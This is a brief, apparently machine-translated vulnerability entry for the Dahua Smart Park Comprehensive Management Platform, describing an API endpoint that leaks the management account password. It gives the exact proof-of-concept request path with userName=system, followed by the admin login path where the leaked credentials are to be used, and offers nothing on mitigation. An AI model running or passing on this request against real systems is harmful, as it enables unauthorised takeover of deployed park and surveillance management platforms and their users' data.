Dahua Smart Park Comprehensive Management Platform User_getuserinfobyusername Action Account Password Leakage Vulnerability

Dahua Smart Park Comprehensive Management Platform user_getUserInfoByUserName.action Account password leakage vulnerability

Vulnerability Description

Dahua Smart Park Comprehensive Management Platform user_getUserInfoByUserName.action has an API interface, resulting in a leak of the management park account password

Vulnerability Impact

Smart Park Comprehensive Management Platform

Network surveying and mapping

Vulnerability reappears

Request a POC

/admin/user_getUserInfoByUserName.action?userName=system

Access the address after obtaining

/admin/login_login.action